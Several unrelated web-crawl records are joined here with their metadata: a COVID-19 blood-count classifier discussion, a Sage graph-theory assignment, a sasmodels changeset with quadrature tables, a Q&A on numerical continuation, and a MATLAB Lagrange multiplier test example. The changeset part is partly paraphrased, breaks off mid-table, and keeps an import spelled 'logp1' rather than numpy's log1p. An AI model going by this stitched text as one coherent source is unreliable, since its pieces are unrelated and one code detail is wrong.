We plot the importance of each feature for every individual, and these results are shown in Fig. 7. Yellow points are associated with individuals for whom the corresponding feature shows a relatively high value. Blue points, on the other hand, are associated with individuals for whom the corresponding feature shows a relatively low value. Furthermore, there is a vertical line separating individuals for whom the feature is contributing either to decrease (left side) or increase (right side) the probability of active SARS-Cov-2 infection. Figure 7a shows the COVID-19 specialized model, and the CBC patterns shown in the figure are not specific to COVID-19, as discussed in previous experiments. Figure 7b shows the stacking model, where the COVID-19 specialized model is included as one of the features (i.e., COVID-19 probability). As the stacking model takes into consideration the probability of diverse infections, COVID-19 specific CBC patterns are found.
The stacking approach allows us to study how the physiological patterns found in the CBCs of different diseases correlate. Figure 7c–e illustrates dependence plots of our COVID-19 specialized model prediction with respect to the remaining diseases, which present relevant patterns that enhance the credibility of our approach. For instance, looking at the right portion of Fig. 7c, we observe a concentration of high Influenza-H1N1 predictions (yellow points) on the upper side of the plot, while on the left side of the plot a similar concentration appears on the lower portion. This behavior shows us that in cases of suspected H1N1, the overall COVID-19 prediction is significant, be it to confirm an H1N1 hypothesis (left side) or rule it out (right side). However, when there is a lower probability of H1N1, we likewise see a lower score attributed by the COVID-19 model. The ensemble learns to use the information regarding all diseases for these hard-to-predict individuals. We observe similar patterns for Influenza-A (Fig. 7d) and Seasonal Influenza (Fig. 7e).
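Plots in the spirit of Fig. 7 can be produced with the shap package roughly as follows; the feature names are hypothetical and the exact styling of the published figures is not reproduced.

```python
import shap

# model: the trained LightGBM stacking model; X: a DataFrame of its stacking
# features (specialized-model probabilities plus selected CBC features).
explainer = shap.Explainer(model)
sv = explainer(X)

# Beeswarm summary (Fig. 7a/b style): one point per individual and feature,
# colored by feature value, positioned by how strongly it pushes the
# prediction toward or away from a positive COVID-19 call.
shap.plots.beeswarm(sv)

# Dependence-style plot (Fig. 7c-e style): the COVID-19 specialized-model
# output colored by a hypothetical "h1n1_probability" column.
shap.plots.scatter(sv[:, "covid_probability"], color=sv[:, "h1n1_probability"])
```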
Employing Shapley values as an explanation technique not only allows us to understand the model's final prediction but also to understand the testing time frame. Supplementary Fig. 4 shows a 2D representation of the tests of several individuals contained in the dataset and their respective RT-PCR results for COVID-19. In Supplementary Fig. 4a we observe no clear distinction between the exams of infected and healthy individuals, representing what might be observed in an attempt to draw linear correlations between analytes. Supplementary Fig. 4b shows a visualization of the decision process of the model in the shape of a 2D representation of the returned Shapley values. This scenario reflects all the non-linear relationships present in a CBC that might be challenging for humans to extrapolate on their own. Not only can we draw clear divisions between the two populations, but we are also able to infer a measure of confidence: the closer to the decision boundary, the higher the uncertainty of the prediction and, thus, the more important the discerning capability becomes when combining these results with other factors relevant for diagnosis, such as reported symptoms and the possible disease onset period.
Predicting data from the second wave proved to be particularly hard, as we observed a deterioration in the performance of our first-wave model as time went on, which might be associated with concept drift. In particular, we observed that the peak in performance in the second half of the chart is associated with a lower COVID-19 prevalence, which implied that the model was losing its ability to predict COVID-19 infections. We hypothesize several explanations for this behavior, including shifts in COVID-19 prevalence across 2020 and 2021, as well as changes in the prevalence of other possible confounding diseases as restriction measures were lifted. Likewise, one of the main characteristics of the second wave was the emergence of a new COVID-19 strain, namely the P.1 variant that ran rampant in Brazil during the analyzed period. It might be the case that the physiological reaction of the body to the new strain was distinct from that to earlier variants, resulting in a degradation in performance. Finally, another possibility is that RT-PCR tests at the time of evaluation might not have been tuned to properly identify the new strain, thus inducing a divergence between model output and ground-truth data due to possible false negatives.
The proposed solution consisted of employing data closer to the start of the second wave, simulating a scenario in which we keep the model as up-to-date as possible before the start of a new pandemic stage. Although we could not test each of these hypotheses individually, the proposed approach should address all three possible explanations described. With this approach, not only did we verify higher performance from the start, but the model was also able to largely mitigate the concept drift phenomenon, retaining an AUROC above the 0.90 threshold throughout most of the evaluated period.
A point of attention that should be addressed by any health professional employing our approach is the presence of co-infections. For instance, multiple cases of COVID-19 hospital cross-infections have been identified55. As we do not have data explicitly concerning co-infections, we cannot provide insights regarding the blood profiles that emerge in such situations, which might confuse the model. It is also important to highlight the impact of ethnicity on CBC results56. Although the large data sample and the demographic plurality of Brazil serve as indicators of robustness, further testing is needed to understand whether the Brazilian model can be directly applied to other contexts. Nevertheless, our method is general enough that the achieved results could potentially be replicated anywhere on Earth if data concerning a specific region/scenario is collected.
In this work, we proposed a novel machine intelligence approach to automated COVID-19 diagnosis through complete blood counts, repurposing an accessible and low-cost exam. The task was formulated as a binary classification problem to predict which analyte combinations are likely to be associated with SARS-Cov-2 infection. We evaluated our approach on a dataset containing over a million exams which, to the authors' knowledge, is the largest COVID-19 dataset to date. One of our key results is that training machine learning models solely on 2020 data is not enough to guarantee robustness in real-world applications, even with high reported performance estimates. This raises several concerns regarding the latest COVID-19 machine learning literature and confirms issues that had already been brought to attention but not properly addressed. Providing information regarding other diseases was essential to guarantee the robustness of our stacking approach, which presented high performance in scenarios with both prevalence and absence of COVID-19 infections, with a reported AUROC of 0.90+.
For future work, it is imperative to assess the impact of our approach on a hospital's daily flow, as the adoption of new technology can potentially disrupt existing processes. This should also enable us to collect data concerning other relevant analyses, such as co-infections, and to study the impact of different demographic profiles. We are currently implementing the developed algorithm in different Brazilian hospitals using an API framework connected directly to their databases. In these scenarios, we aim to understand how the proposed tool can be introduced into a hospital's existing workflow in the least disruptive way, as well as to find out how comfortable health professionals feel when using it. Further validation steps include observing health professionals' interactions with the tool and possible changes in procedures, protocols, and decision-making processes, as well as the benefits of the solution when applied in fast-paced and high-volume contexts.
Since CBCs are widely available and provide results quickly, different use cases have been mapped: to potentially speed up triaging processes in hospitals where other forms of diagnosis are slower; to support clinical diagnosis and triaging in hospitals where other forms of diagnosis are scarce or unavailable; and to reduce the overall burden on traditional diagnostic methods when applied as pre-tests in non-emergency situations (such as elective surgeries), to name a few examples. Given its versatile nature, low cost, and speed, we believe our tool to be particularly useful in a variety of scenarios, both pandemic and post-pandemic.
http://plufa12m331.wikidot.com/project-4 | Project 4
For this Sage project, please watch the Graph Theory video on the Sage videos page. This video is a bit longer than the others, but teaches the basic theory behind graphs. Using these ideas, complete the following tasks.
1. Use Sage to draw the graph for the following adjacency matrix (a minimal Sage sketch for this task is given after the list):
(1)
\begin{align} A=\left(\begin{array}{rrrrrr} 0 & 1 & 0 & 0 & 0 & 0 \\ 0 & 0 & 1 & 0 & 0 & 0 \\ 0 & 0 & 0 & 1 & 0 & 0 \\ 0 & 0 & 0 & 0 & 1 & 0 \\ 0 & 0 & 0 & 0 & 0 & 1 \\ 0 & 0 & 0 & 0 & 0 & 0 \end{array}\right) \end{align}
2. For $A$ given above, draw the graph associated to the matrix $A^2, A^3, A^4, A^5$ and $A^6$.
3. Make up two graphs: one on 4 vertices and one on 5 vertices, using adjacency matrices $C$ and $D$. Have Sage draw your graphs and then draw the graphs for $C^2, C^3, C^4$ and $D^2, D^3, D^4$, etc. Can you guess how graphs associated to matrix powers of the adjacency matrix are related to the original graph?
4. Draw your own graph on 4 vertices and figure out the adjacency matrix and the incidence matrix. Input the graph into Sage using the adjacency matrix and then the incidence matrix for your graph. Use Sage's features to determine whether you created the matrices correctly (i.e., are the two graphs created exactly the same?)
5. Take the following proposed incidence matrix and ask Sage to draw the graph associated to it. Explain why you get an error (in other words, can you use Sage's error to figure out why this is NOT an incidence matrix?) Determine a condition on the columns of a matrix to make it an incidence matrix of a graph.
(2)
\begin{align} B=\left(\begin{array}{rrrrr} 0 & 0 & 1 & 0 & 0 \\ 0 & 0 & 0 & -1 & 1 \\ 1 & -1 & -1 & 0 & 0 \\ 0 & 1 & 0 & 0 & -1 \\ -1 & 0 & -1 & 0 & 0 \\ 0 & 0 & 0 & 1 & 0 \end{array}\right) \end{align}
6. What graph corresponds to the identity matrix as an adjacency matrix? What about the $0$ matrix?
7. Let $J$ be the $n\times n$ matrix given by all 1's, so $J_{i,j}=1$ for all $i,j$. Draw the graph with adjacency matrix $J-I_n$ (where $I_n$ is the identity matrix) for a few different $n$ values. Explain the graph in words. How many edges are there in this graph?
8. Optional Explorations (because I may not know the answer completely or if there is an answer at all):
a. Is there any property that a graph will have that will force the adjacency matrix to be invertible (or nonsingular)?
b. Is there any property a graph will have that will force the adjacency matrix to be singular?
c. What does it mean for two rows to be exactly the same in an adjacency matrix?
d. Can you easily determine the rank of an incidence matrix? Are there any conditions that force the rank to be less than the number of rows or columns?
e. Do you have any questions to add?
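As referenced in task 1, a minimal Sage sketch for tasks 1 and 2 (to be run in a Sage session, where matrix and DiGraph are built in) might look like this:

```python
# Task 1: build the graph of the given adjacency matrix.
# The matrix is not symmetric, so a directed graph is the natural choice.
A = matrix(ZZ, [[0, 1, 0, 0, 0, 0],
                [0, 0, 1, 0, 0, 0],
                [0, 0, 0, 1, 0, 0],
                [0, 0, 0, 0, 1, 0],
                [0, 0, 0, 0, 0, 1],
                [0, 0, 0, 0, 0, 0]])
G = DiGraph(A)
G.show()

# Task 2: draw the graphs associated to the powers A^2, ..., A^6
for k in range(2, 7):
    DiGraph(A**k).show()
```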
http://trac.sasview.org/changeset/d0dc9a3eb51c366ad12aca86498d6593a798252a/sasmodels | # Changeset d0dc9a3 in sasmodels
Timestamp: Dec 4, 2017 8:29:04 AM (5 years ago)
Branches: master, core_shell_microgels, magnetic_model, ticket-1257-vesicle-product, ticket_1156, ticket_1265_superball, ticket_822_more_unit_tests
Children: df69efa
Parents: 7dde87f
Message: document GAUSS_N, GAUSS_Z, GAUSS_W and simplify use from sasmodels.special
Files: 2 edited
First edited file (diff from r3048ec6; from its content, apparently the plugin-model documentation). The list of available C99 math functions is extended: the power-function entry changes from "exp, log, pow(x,y), expm1, sqrt" to "exp, log, pow(x,y), expm1, log1p, sqrt, cbrt", now covering $e^x$, $\ln x$, $x^y$, $e^x - 1$, $\ln(1 + x)$, $\sqrt{x}$ and $\sqrt[3]{x}$, with the note that expm1(x) and log1p(x) are accurate across all $x$, including $x$ very close to zero. The floating-point entry gains fabs(x) alongside fmin(x,y), fmax(x,y), trunc, rint. The NAN entry adds that the alternative test :code:x != x may fail if the compiler optimizes the test away. Finally, the Gaussian-quadrature note now states that similar arrays are available in :code:gauss20.c for 20-point quadrature and :code:gauss150.c for 150-point quadrature, and that the macros :code:GAUSS_N, :code:GAUSS_Z and :code:GAUSS_W are defined so that the order of the integration can be changed by selecting a different source file (:code:source = ["lib/gauss76.c", ...]) without touching the C code. The surrounding entries (M_PI, M_PI_2, M_PI_4, M_SQRT1_2, M_E, the trigonometric functions, and INFINITY) are unchanged context.
Second edited file (diff from re65c3ba; from its content, apparently the sasmodels.special Python module). The module docstring receives the same documentation updates: the power-function list becomes exp, log, pow(x,y), expm1, log1p, sqrt, cbrt; fabs(x) is added to the floating-point functions; the NAN entry notes that :code:x != x may fail if the compiler optimizes the test away; and the old :code:Gauss76Z[i], Gauss76Wt[i] entry is replaced by :code:gauss76.n, gauss76.z[i], gauss76.w[i], the points $z_i$ and weights $w_i$ for 76-point Gaussian quadrature, computing $\int_{-1}^1 f(z)\,dz \approx \sum_{i=1}^{76} w_i\,f(z_i)$, with the note: "When translating the model to C, include 'lib/gauss76.c' in the source and use :code:GAUSS_N, :code:GAUSS_Z, and :code:GAUSS_W. Similar arrays are available in :code:gauss20 for 20-point quadrature and :code:gauss150 for 150-point quadrature. By using :code:import gauss76 as gauss it is easy to change the number of points in the integration."

In the code itself, the numpy imports are extended (cbrt, fabs, pi, nan, inf are added, plus the name logp1 exactly as it appears in the diff, even though numpy spells it log1p), the constants NAN = nan and INFINITY = inf are defined from them, and the six module-level quadrature arrays (Gauss20Wt/Gauss20Z, Gauss76Wt/Gauss76Z, Gauss150Wt/Gauss150Z) are replaced by a small container class plus gauss20 and gauss76 instances built from the same Gauss-Legendre weight and abscissa tables (the numerical values are unchanged and are elided here for readability):

    class Gauss:
        def __init__(self, w, z):
            self.n = len(w)
            self.w = w
            self.z = z

    gauss20 = Gauss(w=np.array([...20 weights...]), z=np.array([...20 points...]))
    gauss76 = Gauss(w=np.array([...76 weights...]), z=np.array([...76 points...]))

The extracted diff is truncated partway through the gauss76 abscissa table.
.560882031601237, .594397368836793, .626910417672267, .658366353758143, .688712135277641, .717896592387704, .74587051350361, .77258672828181, .7980001871612, #60 .822068037328975, .844749694983342, .866006913771982, .885803849292083, .904107119545567, .92088586125215, .936111781934811, .949759207710896, .961805126758768, .972229228520377, #70 .981013938975656, .988144453359837, .993608772723527, .997397786355355, .999505948362153 #75 ]) ) gauss150 = Gauss( z=np.array([ -0.9998723404457334, -0.9993274305065947, -0.9983473449340834, -0.9969322929775997, -0.9950828645255290, -0.9927998590434373, -0.9900842691660192, -0.9869372772712794, -0.9833602541697529, -0.9793547582425894, -0.9749225346595943, -0.9700655145738374, -0.9647858142586956, -0.9590857341746905, -0.9529677579610971, -0.9464345513503147, -0.9394889610042837, -0.9321340132728527, -0.9243729128743136, -0.9162090414984952, -0.9076459563329236, -0.8986873885126239, -0.8893372414942055, -0.8795995893549102, -0.8694786750173527, -0.8589789084007133, -0.8481048644991847, -0.8368612813885015, -0.8252530581614230, -0.8132852527930605, -0.8009630799369827, -0.7882919086530552, -0.7752772600680049, -0.7619248049697269, -0.7482403613363824, -0.7342298918013638, -0.7198995010552305, -0.7052554331857488, -0.6903040689571928, -0.6750519230300931, -0.6595056411226444, -0.6436719971150083, -0.6275578900977726, -0.6111703413658551, -0.5945164913591590, -0.5776035965513142, -0.5604390262878617, -0.5430302595752546, -0.5253848818220803, -0.5075105815339176, -0.4894151469632753, -0.4711064627160663, -0.4525925063160997, -0.4338813447290861, -0.4149811308476706, -0.3959000999390257, -0.3766465660565522, -0.3572289184172501, -0.3376556177463400, -0.3179351925907259, -0.2980762356029071, -0.2780873997969574, -0.2579773947782034, -0.2377549829482451, -0.2174289756869712, -0.1970082295132342, -0.1765016422258567, -0.1559181490266516, -0.1352667186271445, -0.1145563493406956, -0.0937960651617229, -0.0729949118337358, -0.0521619529078925, -0.0313062657937972, -0.0104369378042598, 0.0104369378042598, 0.0313062657937972, 0.0521619529078925, 0.0729949118337358, 0.0937960651617229, 0.1145563493406956, 0.1352667186271445, 0.1559181490266516, 0.1765016422258567, 0.1970082295132342, 0.2174289756869712, 0.2377549829482451, 0.2579773947782034, 0.2780873997969574, 0.2980762356029071, 0.3179351925907259, 0.3376556177463400, 0.3572289184172501, 0.3766465660565522, 0.3959000999390257, 0.4149811308476706, 0.4338813447290861, 0.4525925063160997, 0.4711064627160663, 0.4894151469632753, 0.5075105815339176, 0.5253848818220803, 0.5430302595752546, 0.5604390262878617, 0.5776035965513142, 0.5945164913591590, 0.6111703413658551, 0.6275578900977726, 0.6436719971150083, 0.6595056411226444, 0.6750519230300931, 0.6903040689571928, 0.7052554331857488, 0.7198995010552305, 0.7342298918013638, 0.7482403613363824, 0.7619248049697269, 0.7752772600680049, 0.7882919086530552, 0.8009630799369827, 0.8132852527930605, 0.8252530581614230, 0.8368612813885015, 0.8481048644991847, 0.8589789084007133, 0.8694786750173527, 0.8795995893549102, 0.8893372414942055, 0.8986873885126239, 0.9076459563329236, 0.9162090414984952, 0.9243729128743136, 0.9321340132728527, 0.9394889610042837, 0.9464345513503147, 0.9529677579610971, 0.9590857341746905, 0.9647858142586956, 0.9700655145738374, 0.9749225346595943, 0.9793547582425894, 0.9833602541697529, 0.9869372772712794, 0.9900842691660192, 0.9927998590434373, 0.9950828645255290, 0.9969322929775997, 0.9983473449340834, 0.9993274305065947, 0.9998723404457334 ]), 
w=np.array([ 0.0003276086705538, 0.0007624720924706, 0.0011976474864367, 0.0016323569986067, 0.0020663664924131, 0.0024994789888943, 0.0029315036836558, 0.0033622516236779, 0.0037915348363451, 0.0042191661429919, 0.0046449591497966, 0.0050687282939456, 0.0054902889094487, 0.0059094573005900, 0.0063260508184704, 0.0067398879387430, 0.0071507883396855, 0.0075585729801782, 0.0079630641773633, 0.0083640856838475, 0.0087614627643580, 0.0091550222717888, 0.0095445927225849, 0.0099300043714212, 0.0103110892851360, 0.0106876814158841, 0.0110596166734735, 0.0114267329968529, 0.0117888704247183, 0.0121458711652067, 0.0124975796646449, 0.0128438426753249, 0.0131845093222756, 0.0135194311690004, 0.0138484622795371, 0.0141714592928592, 0.0144882814685445, 0.0147987907597169, 0.0151028518701744, 0.0154003323133401, 0.0156911024699895, 0.0159750356447283, 0.0162520081211971, 0.0165218992159766, 0.0167845913311726, 0.0170399700056559, 0.0172879239649355, 0.0175283451696437, 0.0177611288626114, 0.0179861736145128, 0.0182033813680609, 0.0184126574807331, 0.0186139107660094, 0.0188070535331042, 0.0189920016251754, 0.0191686744559934, 0.0193369950450545, 0.0194968900511231, 0.0196482898041878, 0.0197911283358190, 0.0199253434079123, 0.0200508765398072, 0.0201676730337687, 0.0202756819988200, 0.0203748563729175, 0.0204651529434560, 0.0205465323660984, 0.0206189591819181, 0.0206824018328499, 0.0207368326754401, 0.0207822279928917, 0.0208185680053983, 0.0208458368787627, 0.0208640227312962, 0.0208731176389954, 0.0208731176389954, 0.0208640227312962, 0.0208458368787627, 0.0208185680053983, 0.0207822279928917, 0.0207368326754401, 0.0206824018328499, 0.0206189591819181, 0.0205465323660984, 0.0204651529434560, 0.0203748563729175, 0.0202756819988200, 0.0201676730337687, 0.0200508765398072, 0.0199253434079123, 0.0197911283358190, 0.0196482898041878, 0.0194968900511231, 0.0193369950450545, 0.0191686744559934, 0.0189920016251754, 0.0188070535331042, 0.0186139107660094, 0.0184126574807331, 0.0182033813680609, 0.0179861736145128, 0.0177611288626114, 0.0175283451696437, 0.0172879239649355, 0.0170399700056559, 0.0167845913311726, 0.0165218992159766, 0.0162520081211971, 0.0159750356447283, 0.0156911024699895, 0.0154003323133401, 0.0151028518701744, 0.0147987907597169, 0.0144882814685445, 0.0141714592928592, 0.0138484622795371, 0.0135194311690004, 0.0131845093222756, 0.0128438426753249, 0.0124975796646449, 0.0121458711652067, 0.0117888704247183, 0.0114267329968529, 0.0110596166734735, 0.0106876814158841, 0.0103110892851360, 0.0099300043714212, 0.0095445927225849, 0.0091550222717888, 0.0087614627643580, 0.0083640856838475, 0.0079630641773633, 0.0075585729801782, 0.0071507883396855, 0.0067398879387430, 0.0063260508184704, 0.0059094573005900, 0.0054902889094487, 0.0050687282939456, 0.0046449591497966, 0.0042191661429919, 0.0037915348363451, 0.0033622516236779, 0.0029315036836558, 0.0024994789888943, 0.0020663664924131, 0.0016323569986067, 0.0011976474864367, 0.0007624720924706, 0.0003276086705538 ]) ) | 2022-12-09 07:00:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7137142419815063, "perplexity": 
6915.6598141352215}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711390.55/warc/CC-MAIN-20221209043931-20221209073931-00570.warc.gz"} |
https://scicomp.stackexchange.com/questions/33290/finding-curves-where-function-goes-to-zero-in-two-dimensions | # Finding curves where function goes to zero in two dimensions
Suppose $$f(x,y)$$ is a complex function of two real arguments with roots* that are not discrete points but lie in curves. (Is there a term for this characteristic?) An example is shown below: the black curves show all the points in the $$(x, y)$$ plane where $$f(x, y) = 0$$. What is the best way to find these curves numerically, within a rectangular region?
The obvious solution is to consider 1-D slices along the $$x$$- or $$y$$-axis, and use standard 1-D root-finding algorithms to find the discrete roots along these slices. These points can then be joined up appropriately to form the curves. However I wonder if there is a more efficient strategy, taking into account 2-D information.
Answers can assume some of the properties shown in the example plot. The curves do not terminate within the rectangular region, they do not intersect, and they always have a negative gradient.
*Definition of root: a point $$(x_r, y_r)$$ such that $$f(x_r, y_r) = 0$$.
• Can't you use Newton's method using a vector and the Jacobian? Aug 21 '19 at 18:16
• Isn't this equivalent to find contours for a 2D function? Aug 21 '19 at 22:40
• You might be interested in chebfun's 2D root finding capability.
– Bort
Aug 22 '19 at 9:31
This is a technique called continuation. It typically works by using Newton's method to find one root, then you take steps along the root curve by picking a nearby point as the initial guess for the next Newton step. This is usually done to solve problems of the form $$F_\lambda(x_\lambda)=0$$ where $$\lambda$$ is some parameter, but your problem can be recast into this form.
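Below is a minimal sketch of the naive version of this idea, assuming for illustration a real-valued f (for a complex f you would drive both the real and imaginary parts, or a suitable scalar residual, to zero): step along y and reuse the previous root in x as the initial guess for the next 1-D solve.

```python
import numpy as np
from scipy.optimize import newton

def f(x, y):
    # placeholder example with a single zero curve x + y = 1
    return x + y - 1.0

def trace_zero_curve(y_values, x_guess):
    """Follow one zero curve by warm-starting each 1-D solve in x."""
    curve = []
    for y in y_values:
        x_root = newton(lambda x: f(x, y), x_guess)  # 1-D Newton/secant solve
        curve.append((x_root, y))
        x_guess = x_root  # nearby point becomes the initial guess for the next step
    return np.array(curve)

curve = trace_zero_curve(np.linspace(0.0, 1.0, 50), x_guess=1.0)
```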
If done correctly, this should get what you need provided that 2 root curves don't intersect each other and the root curves don't suddenly stop. An easy method to code yourself provided you have a good Newton solver is pseudo-arclength continuation that essentially tries to progress along the root curve via an estimation of the arclength along the curve, and enforces this condition by adding an extra equation to the Newton problem. In this formulation, the derivatives can be approximated by a forward difference and the "forward" values of $$u$$ and $$\lambda$$ are the unknowns for the new system. | 2021-10-26 22:39:53 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 11, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7077515125274658, "perplexity": 307.78316443025693}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587926.9/warc/CC-MAIN-20211026200738-20211026230738-00325.warc.gz"} |
https://www.mathworks.com/help/econ/conduct-a-lagrange-multiplier-test.html
## Conduct a Lagrange Multiplier Test
This example shows how to calculate the required inputs for conducting a Lagrange multiplier (LM) test with `lmtest`. The LM test compares the fit of a restricted model against an unrestricted model by testing whether the gradient of the loglikelihood function of the unrestricted model, evaluated at the restricted maximum likelihood estimates (MLEs), is significantly different from zero.
The required inputs for `lmtest` are the score function and an estimate of the unrestricted variance-covariance matrix evaluated at the restricted MLEs. This example compares the fit of an AR(1) model against an AR(2) model.
### Step 1. Compute the restricted MLE.
Obtain the restricted MLE by fitting an AR(1) model (with a Gaussian innovation distribution) to the given data. Assume you have presample observations (${y}_{-1}$, ${y}_{0}$) = (9.6249,9.6396).
```Y = [10.1591; 10.1675; 10.1957; 10.6558; 10.2243; 10.4429; 10.5965; 10.3848; 10.3972; 9.9478; 9.6402; 9.7761; 10.0357; 10.8202; 10.3668; 10.3980; 10.2892; 9.6310; 9.6318; 9.1378; 9.6318; 9.1378]; Y0 = [9.6249; 9.6396]; model = arima(1,0,0); fit = estimate(model,Y,'Y0',Y0);```
``` ARIMA(1,0,0) Model (Gaussian Distribution):

                Value     StandardError    TStatistic     PValue
               _______    _____________    __________    _________
    Constant    3.2999        2.4606         1.3411       0.17988
    AR{1}      0.67097       0.24635         2.7237      0.0064564
    Variance   0.12506      0.043015         2.9074      0.0036441
```
When conducting an LM test, only the restricted model needs to be fit.
### Step 2. Compute the gradient matrix.
Estimate the variance-covariance matrix for the unrestricted AR(2) model using the outer product of gradients (OPG) method.
For an AR(2) model with Gaussian innovations, the contribution to the loglikelihood function at time $t$ is given by
`$\mathrm{log}{L}_{t}=-0.5\mathrm{log}\left(2\pi {\sigma }_{\epsilon }^{2}\right)-\frac{\left({y}_{t}-c-{\varphi }_{1}{y}_{t-1}-{\varphi }_{2}{y}_{t-2}{\right)}^{2}}{2{\sigma }_{\epsilon }^{2}}$`
where ${\sigma }_{\epsilon }^{2}$ is the variance of the innovation distribution.
The contribution to the gradient at time $t$ is
`$\left[\begin{array}{cccc}\frac{\partial \mathrm{log}{L}_{t}}{\partial c}& \frac{\partial \mathrm{log}{L}_{t}}{\partial {\varphi }_{1}}& \frac{\partial \mathrm{log}{L}_{t}}{\partial {\varphi }_{2}}& \frac{\partial \mathrm{log}{L}_{t}}{\partial {\sigma }_{\epsilon }^{2}}\end{array}\right],$`
where
`$\begin{array}{ccc}\frac{\partial \mathrm{log}{L}_{t}}{\partial c}& =& \frac{{y}_{t}-c-{\varphi }_{1}{y}_{t-1}-{\varphi }_{2}{y}_{t-2}}{{\sigma }_{\epsilon }^{2}}\\ \frac{\partial \mathrm{log}{L}_{t}}{\partial {\varphi }_{1}}& =& \frac{{y}_{t-1}\left({y}_{t}-c-{\varphi }_{1}{y}_{t-1}-{\varphi }_{2}{y}_{t-2}\right)}{{\sigma }_{\epsilon }^{2}}\\ \frac{\partial \mathrm{log}{L}_{t}}{\partial {\varphi }_{2}}& =& \frac{{y}_{t-2}\left({y}_{t}-c-{\varphi }_{1}{y}_{t-1}-{\varphi }_{2}{y}_{t-2}\right)}{{\sigma }_{\epsilon }^{2}}\\ \frac{\partial \mathrm{log}{L}_{t}}{\partial {\sigma }_{\epsilon }^{2}}& =& -\frac{1}{2{\sigma }_{\epsilon }^{2}}+\frac{\left({y}_{t}-c-{\varphi }_{1}{y}_{t-1}-{\varphi }_{2}{y}_{t-2}{\right)}^{2}}{2{\sigma }_{\epsilon }^{4}}\end{array}$`
Evaluate the gradient matrix, $G$, at the restricted MLEs (using ${\hat{\varphi}}_{2}=0$).
```c = fit.Constant;
phi1 = fit.AR{1};
phi2 = 0;
sig2 = fit.Variance;
Yt = Y;
Yt1 = [9.6396; Y(1:end-1)];
Yt2 = [9.6249; Yt1(1:end-1)];
N = length(Y);
G = zeros(N,4);
G(:,1) = (Yt-c-phi1*Yt1-phi2*Yt2)/sig2;
G(:,2) = Yt1.*(Yt-c-phi1*Yt1-phi2*Yt2)/sig2;
G(:,3) = Yt2.*(Yt-c-phi1*Yt1-phi2*Yt2)/sig2;
G(:,4) = -0.5/sig2 + 0.5*(Yt-c-phi1*Yt1-phi2*Yt2).^2/sig2^2;```
### Step 3. Estimate the variance-covariance matrix.
Compute the OPG variance-covariance matrix estimate.
`V = inv(G'*G)`
```V = 4×4
    6.1431   -0.6966    0.0827    0.0367
   -0.6966    0.1535   -0.0846   -0.0061
    0.0827   -0.0846    0.0771    0.0024
    0.0367   -0.0061    0.0024    0.0019
```
Numerical inaccuracies can occur due to computer precision. To make the variance-covariance matrix symmetric, combine half of its value with half of its transpose.
`V = V/2 + V'/2;`
### Step 4. Calculate the score function.
Evaluate the score function (the sum of the individual contributions to the gradient).
`score = sum(G);`
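For readers working outside MATLAB, here is a rough NumPy sketch of how steps 3 through 5 fit together, assuming the N-by-4 gradient matrix built above is available as a NumPy array `G` (the variable names simply mirror the MATLAB code):

```python
import numpy as np
from scipy.stats import chi2

# G: (N, 4) matrix of per-observation gradient contributions, as built above
V = np.linalg.inv(G.T @ G)     # OPG estimate of the variance-covariance matrix
V = (V + V.T) / 2              # symmetrise against round-off
score = G.sum(axis=0)          # score function: sum of the gradient contributions

dof = 1                        # one restriction (the AR{2} coefficient)
LMstat = score @ V @ score     # Lagrange multiplier statistic
crit = chi2.ppf(0.95, dof)     # 5% critical value (3.8415 for 1 degree of freedom)
reject = LMstat > crit         # False here: the AR(1) model is not rejected
```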
### Step 5. Conduct the Lagrange multiplier test.
Conduct the Lagrange multiplier test to compare the restricted AR(1) model against the unrestricted AR(2) model. The number of restrictions (the degree of freedom) is one.
`[h,p,LMstat,crit] = lmtest(score,V,1)`
```h = logical 0 ```
```p = 0.5787 ```
```LMstat = 0.3084 ```
```crit = 3.8415 ```
